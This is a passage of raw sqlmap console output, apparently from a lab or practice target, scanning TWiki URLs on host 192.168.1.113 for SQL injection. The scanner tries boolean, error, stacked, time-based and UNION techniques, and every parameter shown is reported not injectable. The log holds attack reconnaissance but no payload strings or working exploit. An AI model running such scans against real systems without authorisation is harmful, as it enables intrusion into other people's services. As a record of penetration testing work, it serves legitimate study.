[19:43:58] [INFO] testing for SQL injection on GET parameter 'skin'
[19:43:58] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:43:58] [WARNING] reflective value(s) found and filtering out
[19:44:00] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:44:00] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:44:01] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:44:01] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:44:02] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:44:03] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:44:03] [INFO] testing 'MySQL inline queries'
[19:44:03] [INFO] testing 'PostgreSQL inline queries'
[19:44:03] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:44:03] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:44:04] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:44:04] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:44:05] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:44:06] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:44:07] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:44:08] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:44:08] [INFO] testing 'Oracle AND time-based blind'
[19:44:09] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:44:09] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:44:21] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:44:32] [WARNING] GET parameter 'skin' is not injectable
[19:44:32] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 129:
GET http://192.168.1.113:80/twiki/bin/rdiff/Sandbox/WebHome?rev1=1.8&rev2=1.7
do you want to test this URL? [Y/n/q]
> Y
[19:44:32] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/rdiff/Sandbox/WebHome?rev1=1.8&rev2=1.7'
[19:44:32] [INFO] testing connection to the target URL
[19:44:32] [INFO] testing if the target URL is stable
[19:44:33] [INFO] target URL is stable
[19:44:33] [INFO] testing if GET parameter 'rev1' is dynamic
[19:44:33] [WARNING] GET parameter 'rev1' does not appear dynamic
[19:44:33] [WARNING] heuristic (basic) test shows that GET parameter 'rev1' might not be injectable
[19:44:33] [INFO] testing for SQL injection on GET parameter 'rev1'
[19:44:33] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:44:34] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:44:34] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:44:35] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:44:35] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:44:36] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:44:37] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:44:37] [INFO] testing 'MySQL inline queries'
[19:44:37] [INFO] testing 'PostgreSQL inline queries'
[19:44:37] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:44:37] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:44:37] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:44:38] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:44:38] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:44:39] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:44:39] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:44:40] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:44:40] [INFO] testing 'Oracle AND time-based blind'
[19:44:41] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:44:41] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:44:47] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:44:54] [WARNING] GET parameter 'rev1' is not injectable
[19:44:54] [INFO] testing if GET parameter 'rev2' is dynamic
[19:44:54] [WARNING] GET parameter 'rev2' does not appear dynamic
[19:44:54] [WARNING] heuristic (basic) test shows that GET parameter 'rev2' might not be injectable
[19:44:54] [INFO] testing for SQL injection on GET parameter 'rev2'
[19:44:54] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:44:55] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:44:56] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:44:57] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:44:57] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:44:58] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:44:58] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:44:58] [INFO] testing 'MySQL inline queries'
[19:44:59] [INFO] testing 'PostgreSQL inline queries'
[19:44:59] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:44:59] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:45:00] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:45:00] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:45:01] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:45:02] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:45:02] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:45:03] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:45:04] [INFO] testing 'Oracle AND time-based blind'
[19:45:04] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:45:11] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:45:17] [WARNING] GET parameter 'rev2' is not injectable
[19:45:17] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 130:
GET http://192.168.1.113:80/twiki/bin/view/Sandbox/WebHome?rev=1.7
do you want to test this URL? [Y/n/q]
> Y
[19:45:17] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/Sandbox/WebHome?rev=1.7'
[19:45:17] [INFO] testing connection to the target URL
[19:45:18] [INFO] testing if the target URL is stable
[19:45:19] [INFO] target URL is stable
[19:45:19] [INFO] testing if GET parameter 'rev' is dynamic
[19:45:19] [WARNING] GET parameter 'rev' does not appear dynamic
[19:45:19] [WARNING] heuristic (basic) test shows that GET parameter 'rev' might not be injectable
[19:45:19] [INFO] heuristic (XSS) test shows that GET parameter 'rev' might be vulnerable to XSS attacks
[19:45:19] [INFO] testing for SQL injection on GET parameter 'rev'
[19:45:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:45:19] [WARNING] reflective value(s) found and filtering out
[19:45:21] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:45:21] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:45:21] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:45:22] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:45:23] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:45:23] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:45:23] [INFO] testing 'MySQL inline queries'
[19:45:23] [INFO] testing 'PostgreSQL inline queries'
[19:45:24] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:45:24] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:45:24] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:45:25] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:45:25] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:45:25] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:45:26] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:45:27] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:45:27] [INFO] testing 'Oracle AND time-based blind'
[19:45:28] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:45:28] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:45:35] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:45:43] [WARNING] GET parameter 'rev' is not injectable
[19:45:43] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
[19:45:43] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/Sandbox/WebHome?rev1=1.7&rev2=1.6'
[19:45:43] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Sandbox/WebHome?rev=1.6'
URL 131:
GET http://192.168.1.113:80/twiki/bin/oops/Sandbox/WebHome?template=oopsmore&param1=1.8&param2=1.8
do you want to test this URL? [Y/n/q]
> Y
[19:45:43] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/oops/Sandbox/WebHome?template=oopsmore&param1=1.8&param2=1.8'
[19:45:43] [INFO] testing connection to the target URL
[19:45:43] [INFO] testing if the target URL is stable
[19:45:44] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[19:45:44] [INFO] testing if GET parameter 'template' is dynamic
[19:45:44] [INFO] confirming that GET parameter 'template' is dynamic
[19:45:44] [INFO] GET parameter 'template' is dynamic
[19:45:44] [INFO] heuristics detected web page charset 'ascii'
[19:45:44] [WARNING] heuristic (basic) test shows that GET parameter 'template' might not be injectable
[19:45:44] [INFO] heuristic (XSS) test shows that GET parameter 'template' might be vulnerable to XSS attacks
[19:45:44] [INFO] testing for SQL injection on GET parameter 'template'
[19:45:44] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:45:44] [WARNING] reflective value(s) found and filtering out
[19:45:45] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:45:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:45:46] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:45:46] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:45:47] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:45:47] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:45:47] [INFO] testing 'MySQL inline queries'
[19:45:47] [INFO] testing 'PostgreSQL inline queries'
[19:45:47] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:45:47] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:45:48] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:45:48] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:45:49] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:45:49] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:45:50] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:45:50] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:45:51] [INFO] testing 'Oracle AND time-based blind'
[19:45:51] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:45:51] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:45:56] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:46:01] [WARNING] GET parameter 'template' is not injectable
[19:46:01] [INFO] testing if GET parameter 'param1' is dynamic
[19:46:01] [WARNING] GET parameter 'param1' does not appear dynamic
[19:46:01] [WARNING] heuristic (basic) test shows that GET parameter 'param1' might not be injectable
[19:46:01] [INFO] heuristic (XSS) test shows that GET parameter 'param1' might be vulnerable to XSS attacks
[19:46:01] [INFO] testing for SQL injection on GET parameter 'param1'
[19:46:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:46:02] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:46:03] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:46:03] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:46:04] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:46:05] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:46:05] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:46:05] [INFO] testing 'MySQL inline queries'
[19:46:05] [INFO] testing 'PostgreSQL inline queries'
[19:46:05] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:46:06] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:46:06] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:46:07] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:46:07] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:46:07] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:46:08] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:46:09] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:46:09] [INFO] testing 'Oracle AND time-based blind'
[19:46:10] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:46:14] [INFO] target URL appears to be UNION injectable with 1 columns
[19:46:14] [WARNING] applying generic concatenation with double pipes ('||')
[19:46:14] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. '--dbms=mysql')
[19:46:15] [INFO] target URL appears to be UNION injectable with 10 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
[19:46:19] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')
[19:46:20] [INFO] testing 'MySQL UNION query (63) - 1 to 10 columns'
[19:46:27] [WARNING] GET parameter 'param1' is not injectable
[19:46:27] [INFO] testing if GET parameter 'param2' is dynamic
[19:46:27] [WARNING] GET parameter 'param2' does not appear dynamic
[19:46:27] [WARNING] heuristic (basic) test shows that GET parameter 'param2' might not be injectable
[19:46:27] [INFO] testing for SQL injection on GET parameter 'param2'
[19:46:27] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:46:29] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:46:29] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:46:29] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:46:30] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:46:30] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:46:31] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:46:31] [INFO] testing 'MySQL inline queries'
[19:46:31] [INFO] testing 'PostgreSQL inline queries'
[19:46:31] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:46:31] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:46:32] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:46:32] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:46:33] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:46:33] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:46:34] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:46:34] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:46:35] [INFO] testing 'Oracle AND time-based blind'
[19:46:35] [INFO] testing 'Generic UNION query (63) - 1 to 10 columns'
[19:46:42] [INFO] testing 'MySQL UNION query (63) - 1 to 10 columns'
[19:46:49] [WARNING] GET parameter 'param2' is not injectable
[19:46:49] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 132:
GET http://192.168.1.113/twiki/bin/search/Main/?search=\.*&scope=topic&order=modified&reverse=on&regex=on&nosearch=on&limit=100
do you want to test this URL? [Y/n/q]
> Y
[19:46:49] [INFO] testing URL 'http://192.168.1.113/twiki/bin/search/Main/?search=\.*&scope=topic&order=modified&reverse=on&regex=on&nosearch=on&limit=100'
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[19:46:49] [INFO] testing connection to the target URL
[19:46:49] [INFO] testing if the target URL is stable
[19:46:50] [INFO] target URL is stable
[19:46:50] [INFO] testing if URI parameter '#1*' is dynamic
[19:46:50] [INFO] confirming that URI parameter '#1*' is dynamic
[19:46:50] [INFO] URI parameter '#1*' is dynamic
[19:46:50] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[19:46:51] [INFO] testing for SQL injection on URI parameter '#1*'
[19:46:51] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:46:52] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:46:52] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:46:52] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:46:53] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:46:53] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:46:54] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:46:54] [INFO] testing 'MySQL inline queries'
[19:46:54] [INFO] testing 'PostgreSQL inline queries'
[19:46:54] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:46:54] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:46:55] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:46:55] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:46:55] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:46:56] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:46:56] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:46:57] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:46:57] [INFO] testing 'Oracle AND time-based blind'
[19:46:58] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:46:58] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:47:08] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:47:26] [WARNING] URI parameter '#1*' is not injectable
[19:47:26] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 133:
GET http://192.168.1.113/twiki/bin/search/Main/?search=\.*&scope=topic&order=modified&reverse=on&regex=on&nosearch=on&limit=200
do you want to test this URL? [Y/n/q]
> Y
[19:47:26] [INFO] testing URL 'http://192.168.1.113/twiki/bin/search/Main/?search=\.*&scope=topic&order=modified&reverse=on&regex=on&nosearch=on&limit=200'
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[19:47:26] [INFO] testing connection to the target URL
[19:47:28] [INFO] testing if the target URL is stable
[19:47:28] [INFO] target URL is stable
[19:47:28] [INFO] testing if URI parameter '#1*' is dynamic
[19:47:29] [INFO] confirming that URI parameter '#1*' is dynamic
[19:47:29] [INFO] URI parameter '#1*' is dynamic
[19:47:29] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[19:47:30] [INFO] testing for SQL injection on URI parameter '#1*'
[19:47:30] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:47:33] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:47:34] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:47:36] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:47:38] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:47:40] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:47:41] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:47:42] [INFO] testing 'MySQL inline queries'
[19:47:42] [INFO] testing 'PostgreSQL inline queries'
[19:47:43] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:47:43] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:47:44] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:47:46] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:47:47] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:47:49] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:47:50] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:47:52] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:47:54] [INFO] testing 'Oracle AND time-based blind'
[19:47:56] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:47:56] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:48:15] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:48:35] [WARNING] URI parameter '#1*' is not injectable
[19:48:35] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 134:
GET http://192.168.1.113/twiki/bin/search/Main/?search=\.*&scope=topic&order=modified&reverse=on&regex=on&nosearch=on&limit=400
do you want to test this URL? [Y/n/q]
> Y
[19:48:35] [INFO] testing URL 'http://192.168.1.113/twiki/bin/search/Main/?search=\.*&scope=topic&order=modified&reverse=on&regex=on&nosearch=on&limit=400'
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[19:48:35] [INFO] testing connection to the target URL
[19:48:36] [INFO] testing if the target URL is stable
[19:48:37] [INFO] target URL is stable
[19:48:37] [INFO] testing if URI parameter '#1*' is dynamic
[19:48:37] [INFO] confirming that URI parameter '#1*' is dynamic
[19:48:37] [INFO] URI parameter '#1*' is dynamic
[19:48:38] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[19:48:38] [INFO] testing for SQL injection on URI parameter '#1*'
[19:48:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:48:42] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:48:42] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:48:44] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:48:46] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:48:47] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:48:49] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:48:49] [INFO] testing 'MySQL inline queries'
[19:48:50] [INFO] testing 'PostgreSQL inline queries'
[19:48:50] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:48:51] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:48:52] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:48:53] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:48:55] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:48:56] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:48:58] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:49:00] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:49:01] [INFO] testing 'Oracle AND time-based blind'
[19:49:03] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:49:03] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:49:18] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:49:24] [WARNING] URI parameter '#1*' is not injectable
[19:49:24] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 135:
GET http://192.168.1.113/twiki/bin/search/Main/?search=\.*&scope=topic&order=modified&reverse=on&regex=on&nosearch=on&limit=800
do you want to test this URL? [Y/n/q]
> Y
[19:49:24] [INFO] testing URL 'http://192.168.1.113/twiki/bin/search/Main/?search=\.*&scope=topic&order=modified&reverse=on&regex=on&nosearch=on&limit=800'
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[19:49:24] [INFO] testing connection to the target URL
[19:49:25] [INFO] testing if the target URL is stable
[19:49:25] [INFO] target URL is stable
[19:49:25] [INFO] testing if URI parameter '#1*' is dynamic
[19:49:25] [INFO] confirming that URI parameter '#1*' is dynamic
[19:49:26] [INFO] URI parameter '#1*' is dynamic
[19:49:26] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[19:49:26] [INFO] testing for SQL injection on URI parameter '#1*'
[19:49:26] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:49:27] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:49:27] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:49:28] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:49:28] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:49:29] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:49:29] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:49:29] [INFO] testing 'MySQL inline queries'
[19:49:29] [INFO] testing 'PostgreSQL inline queries'
[19:49:30] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:49:30] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:49:30] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:49:31] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:49:31] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:49:32] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:49:32] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:49:33] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:49:33] [INFO] testing 'Oracle AND time-based blind'
[19:49:34] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:49:34] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:49:40] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:49:45] [WARNING] URI parameter '#1*' is not injectable
